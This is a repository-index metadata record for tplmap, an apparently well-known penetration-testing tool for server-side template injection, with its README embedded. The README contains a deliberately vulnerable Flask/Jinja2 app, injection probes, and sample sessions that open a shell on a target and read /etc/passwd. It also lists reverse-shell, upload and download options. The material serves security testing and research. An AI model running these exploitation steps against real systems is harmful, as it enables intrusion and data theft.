{"id":13539040,"url":"https://github.com/epinna/tplmap","last_synced_at":"2025-04-12T20:38:49.010Z","repository":{"id":40568382,"uuid":"62751496","full_name":"epinna/tplmap","owner":"epinna","description":"Server-Side Template Injection and Code Injection Detection and Exploitation Tool","archived":false,"fork":false,"pushed_at":"2024-04-21T14:47:13.000Z","size":665,"stargazers_count":3906,"open_issues_count":45,"forks_count":683,"subscribers_count":83,"default_branch":"master","last_synced_at":"2025-04-05T19:07:07.100Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/epinna.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-07-06T20:33:18.000Z","updated_at":"2025-04-05T18:10:53.000Z","dependencies_parsed_at":"2024-01-03T04:09:00.607Z","dependency_job_id":"9b81e3b4-eb06-47a2-ada2-e35c32c9b3da","html_url":"https://github.com/epinna/tplmap","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/epinna","download_url":"https://codeload.github.com/epinna/
tplmap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248631668,"owners_count":21136554,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:19.421Z","updated_at":"2025-04-12T20:38:48.993Z","avatar_url":"https://github.com/epinna.png","language":"Python","readme":"Tplmap\n======\n\n\u003e This project is no longer maintained. I'm happy to merge new PRs as long as they don't break the [test suite](https://github.com/epinna/tplmap/wiki/Run-the-test-suite).\n\nTplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.\n\nThe tool and its test suite are developed to research the SSTI vulnerability class and to be used as an offensive security tool during web application penetration tests.\n\nThe sandbox break-out techniques came from James Kettle's [Server-Side Template Injection: RCE For The Modern Web App][10], other public research [\\[1\\]][1] [\\[2\\]][2], and original contributions to this tool [\\[3\\]][3] [\\[4\\]][4].\n\nIt can exploit several code contexts and blind injection scenarios. 
It also supports _eval()_-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.\n\nServer-Side Template Injection\n------------------------------\n\nAssume that you are auditing a web site that generates dynamic pages using templates composed with user-provided values, such as this web application written in Python and [Flask][12] that uses the [Jinja2][11] template engine in an unsafe way.\n\n```python\nfrom flask import Flask, request\nfrom jinja2 import Environment\n\napp = Flask(__name__)\nJinja2 = Environment()\n\n@app.route(\"/page\")\ndef page():\n\n    name = request.values.get('name')\n    \n    # SSTI VULNERABILITY\n    # The vulnerability is introduced by concatenating the\n    # user-provided `name` variable to the template string.\n    output = Jinja2.from_string('Hello ' + name + '!').render()\n    \n    # Instead, the variable should be passed to the template context.\n    # Jinja2.from_string('Hello {{name}}!').render(name = name)\n\n    return output\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=80)\n```\n\nFrom a black box testing perspective, the page reflects the value similarly to an XSS vulnerability, but also computes basic operations at runtime, disclosing its SSTI nature.\n\n```\n$ curl -g 'http://www.target.com/page?name=John'\nHello John!\n$ curl -g 'http://www.target.com/page?name={{7*7}}'\nHello 49!\n```\n\nExploitation\n------------\n\nTplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. 
Run it against the URL to test if the parameters are vulnerable.\n\n```\n$ ./tplmap.py -u 'http://www.target.com/page?name=John'\n[+] Tplmap 0.5\n    Automatic Server-Side Template Injection Detection and Exploitation Tool\n\n[+] Testing if GET parameter 'name' is injectable\n[+] Smarty plugin is testing rendering with tag '{*}'\n[+] Smarty plugin is testing blind injection\n[+] Mako plugin is testing rendering with tag '${*}'\n...\n[+] Jinja2 plugin is testing rendering with tag '{{*}}'\n[+] Jinja2 plugin has confirmed injection with tag '{{*}}'\n[+] Tplmap identified the following injection point:\n\n  GET parameter: name\n  Engine: Jinja2\n  Injection: {{*}}\n  Context: text\n  OS: linux\n  Technique: render\n  Capabilities:\n\n   Shell command execution: ok\n   Bind and reverse shell: ok\n   File write: ok\n   File read: ok\n   Code evaluation: ok, python code\n\n[+] Rerun tplmap providing one of the following options:\n\n    --os-shell                Run shell on the target\n    --os-cmd                  Execute shell commands\n    --bind-shell PORT         Connect to a shell bind to a target port\n    --reverse-shell HOST PORT Send a shell back to the attacker's port\n    --upload LOCAL REMOTE     Upload files to the server\n    --download REMOTE LOCAL   Download remote files\n```\n\nUse the `--os-shell` option to launch a pseudo-terminal on the target.\n\n```\n$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'\n[+] Tplmap 0.5\n    Automatic Server-Side Template Injection Detection and Exploitation Tool\n\n[+] Run commands on the operating system.\n\nlinux $ whoami\nwww\nlinux $ cat /etc/passwd\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\n```\n\nSupported template engines\n--------------------------\n\nTplmap supports over 15 template engines, unsandboxed template engines and generic _eval()_-like injections.\n\n| Engine                 | Remote Command Execution |  Blind | Code evaluation | 
File read | File write |\n|------------------------|---------------|-------------------|-----------------|-----------|------------|\n| Mako                   | ✓ |  ✓                | Python          |  ✓        |  ✓         |\n| Jinja2                 | ✓ |  ✓                | Python          |  ✓        |  ✓         |\n| Python (code eval)     | ✓ |  ✓                | Python          |  ✓        |  ✓         |\n| Tornado                | ✓ |  ✓                | Python          |  ✓        |  ✓         |\n| Nunjucks               | ✓ |  ✓                | JavaScript      |  ✓        |  ✓         |\n| Pug                    | ✓ |  ✓                | JavaScript      |  ✓        |  ✓         |\n| doT                    | ✓ |  ✓                | JavaScript      |  ✓        |  ✓         |\n| Marko                  | ✓ |  ✓                | JavaScript      |  ✓        |  ✓         |\n| JavaScript (code eval) | ✓ |  ✓                | JavaScript      |  ✓        |  ✓         |\n| Dust (\u003c= dustjs-helpers@1.5.0) | ✓ |  ✓        | JavaScript      |  ✓        |  ✓         |\n| EJS                    | ✓ |  ✓                | JavaScript      |  ✓        |  ✓         |\n| Ruby (code eval)       | ✓ |  ✓                | Ruby            |  ✓        |  ✓         |\n| Slim                   | ✓ |  ✓                | Ruby            |  ✓        |  ✓         |\n| ERB                    | ✓ |  ✓                | Ruby            |  ✓        |  ✓         |\n| Smarty (unsecured)     | ✓ |  ✓                | PHP             |  ✓        |  ✓         |\n| PHP (code eval)        | ✓ |  ✓                | PHP             |  ✓        |  ✓         |\n| Twig (\u003c=1.19)          | ✓ |  ✓                | PHP             |  ✓        |  ✓         |\n| Freemarker             | ✓ |  ✓                | Java            |  ✓        |  ✓         |\n| Velocity               | ✓ |  ✓                | Java            |  ✓        |  ✓         |\n| Twig (\u003e1.19)           | × | ×               
  | ×               | ×         | ×          |\n| Smarty (secured)       | × | ×                 | ×               | ×         | ×          |\n| Dust (\u003e dustjs-helpers@1.5.0) | × | ×          | ×               | ×         | ×          |\n\n\nBurp Suite Plugin\n-----------------\n\nSee [burp_extension/README.md](burp_extension/README.md).\n\n[10]: http://blog.portswigger.net/2015/08/server-side-template-injection.html\n[3]: https://github.com/epinna/tplmap/issues/9\n[4]: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine\n[1]: https://artsploit.blogspot.co.uk/2016/08/pprce2.html\n[11]: http://jinja.pocoo.org/\n[12]: http://flask.pocoo.org/\n[2]: https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/\n","funding_links":[],"categories":["Tools","Vulnerabilities \u0026\u0026 Vulnerability Management \u0026\u0026 Vulnerability Discovery/Hunting \u0026\u0026 Vulnerability Development \u0026\u0026 Exploitation \u0026\u0026 Fuzzing","Exploitation","Weapons","Python (1887)","Python","Red Team \u0026 Penetration Testing","Web Exploitation","Web"],"sub_categories":["Offensive","Web Exploitation","Exploitation","SSTI Injection","Tools","Web injection tools","Web Injection Tools","Penetration Testing Report Templates"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fepinna%2Ftplmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fepinna%2Ftplmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fepinna%2Ftplmap/lists"}